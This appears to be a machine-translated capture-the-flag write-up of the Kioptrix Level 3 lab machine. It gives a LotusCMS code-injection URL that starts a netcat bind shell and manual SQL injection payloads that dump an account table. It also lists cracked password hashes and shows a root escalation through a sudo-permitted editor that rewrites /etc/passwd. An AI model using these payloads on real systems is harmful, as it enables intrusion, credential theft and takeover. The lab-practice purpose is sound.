Kioptrix_Level_3 penetration Solution

Objectives:

192.168.1.13

First nmap scan target: nmap-sT-A-P0 192.168.1.13

PORT STATE SERVICE VERSION

22/Tcp open sshOpenSSH4.7p1 Debian 8ubuntu1. 2 (protocol 2.0)

80/Tcp open httpApache httpd 2.2.8(Ubuntu)PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

....

Running: Linux 2.6.X

OS CPE: cpe:/o: linux: linux_kernel: 2.6

OS details: Linux 2.6.9-2.6.33

Only ports 22 and 80 are enabled.

No system vulnerabilities can be exploited by scanning with Nessus. Because port 80 is opened, you can try to penetrate the web and open it in the browser ,:

View Source Code:

You can guess that the website system is LotusCMS and search for the CMS vulnerability on the Internet,

So nowThought 1: ExploitationLotus CMSPrevious vulnerability penetration.Continue viewing the website and click the Login option,

Try to see if there are logon bypasses and weak passwords. Failed...

Continue to view and analyze the website, and go to this directory: http: // 192.168.1.13/gallery /,

View the source code of this page, there are several gains:

(1)

Note the second line: <meta http-equiv = "Generator" content = "Gallarific"/> what is Gallarific? Search online,

No, there are vulnerabilities that can be exploited.The second approach: ExploitationGallarific.

(2)

See no? Comment out the line, <! -<A href = "gadmin"> Admin </a> & nbsp;->Gadmin It's a bit like the link to the background address. Try? Http: // 192.168.1.13/gallery/gadmin/, sure enough,

Try to see whether there are logon bypasses and weak passwords. Failed...

Later, I checked and analyzed the website and found no more useful information. Finally, I threw the website to WVS, which didn't disappoint me. I found the code injection vulnerability in several places, so I got it again.The third idea is to use the code injection vulnerability for penetration.

Based on the above analysis, the idea of penetration is summarized as follows:

Idea 1: Use the previous vulnerabilities of Lotus CMS for penetration.

Idea 2: Use the code injection vulnerability for penetration.

Idea 3: Use the Gallarific vulnerability for penetration.

 

Next, we will try three ideas one by one:

Train of Thought 1: There is very little information on the Internet, and I will give up now...

Idea 2: Use the code injection vulnerability for penetration.

Http: // 192.168.1.13/index. php? Page =$ {@ print (system (% 22ls % 22)} \, return

Attackers can execute arbitrary code, remotely listen to a port, connect to it locally, and execute:

Http: // 192.168.1.13/index. php? Page =$ {@ print (system ("/bin/nc +-l +-p + 5555 +-e +/bin/bash")} \, local listener, (The nc path can be found by running find/-name nc)

It can be seen that it is not the root permission, and then I tried N Local Elevation of Privilege codes (if anyone has the code that can be locally Elevation of Privilege, I hope to share it with me, Thank you, let's put down this idea for the moment and try Train of Thought 3.

Idea 3: Use the Gallarific vulnerability for penetration.

Search for Gallarific vulnerabilities on exploit-db,

You can see that there is an SQL Injection vulnerability, which is opened as follows:

Injection point: www.site.com/gallery.php? Id = null

So try the following link: http: // 192.168.1.13/gallery. php? Id = 1 has been injected, and can be directly thrown into sqlmap for convenience. But in order to have a better understanding of SQL injection, no tools are needed here, so ....

Number of fields to guess:

Http: // 192.168.1.13/gallery. php? Id = 1 order by 6-normal

Http: // 192.168.1.13/gallery. php? Id = 1 order by 7-the number of error fields is 6

The following fields are available:

Http: // 192.168.1.13/gallery. php? Id = 1 and 1 = 2 union select 1, 2, 3, 4, 5, 6 Return

It can be seen that 3 can be used ....

The following table names are displayed:

Http: // youip/gallery. php? Id = 1 and 1 = 2 union select 1, 2, (select group_concat (table_name) from information_schema.tables where table_schema = database (), 4, 5, 6

The returned result is as follows:

Dev_accounts, Gallarific_comments, gallarific_galleries, gallarific_photos, gallarific_settings, gallarific_stats,Gallarific_users

Note that two tables, dev_accounts and gallarific_users, can be guessed as the account and user information table. In this case, we think that SSH is enabled. First, the information in dev_accounts is displayed, and we try to log on to the client through SSH.

All names of dev_accounts are listed:

Http: // youip/gallery. php? Id = 1 and 1 = 2 union select 1, 2, (select group_concat (column_name) from information_schema.columns where table_name = 'dev _ accounts'), 6

The returned result is as follows:

Details of username and password are displayed:

Http: // youip/gallery. php? Id = 1 and 1 = 2 union select 1, 2, (select group_concat (username, 0x3A, password) from dev_accounts), 4,5, 6

The returned result is as follows:

There are two users in total:

Dreg 0d3eccfb887aabd50f243b3f155c0f85

Loneferret 5badcaf789d3d1d09794d8f021f40f0e

I threw it into the online cracking, But I was lucky to have both of them successfully cracked:

Dreg 0d3eccfb887aabd50f243b3f155c0f85 -- Mast3r

Loneferret 5badcaf789d3d1d09794d8f021f40f0e -- starwars

Try SSH Login below, succeeded

Ls,

Note the file CompanyPolicy. READEME.

We can see that ht may be an editor. Try sudo ht,

Press F3 to open a file/etc/passwd (or/etc/sudoers) and edit the loneferrt line to change 1000 and 100 to 0, CTRL + W to save, respectively,

Log on to the server over SSH again and run id & whoami,. Root permission already exists,

Note: If you open the/etc/sudoers file, put the following line:

Loneferret ALL = NOPASSWD :! /Usr/bin/su,/usr/local/bin/ht

Changed to loneferret ALL = (ALL) ALL # NOPASSWD :! /Usr/bin/su,/usr/local/bin/ht.

At this point, Kioptrix Level 3 penetration has ended and has learned a lot. O (distinct _ distinct) O ~

Note: if this is the first time I write this article, I hope you can correct it and provide guidance. Thank you.

E-mail: felixk3y # qq.com Weibo: http://t.qq.com/root-security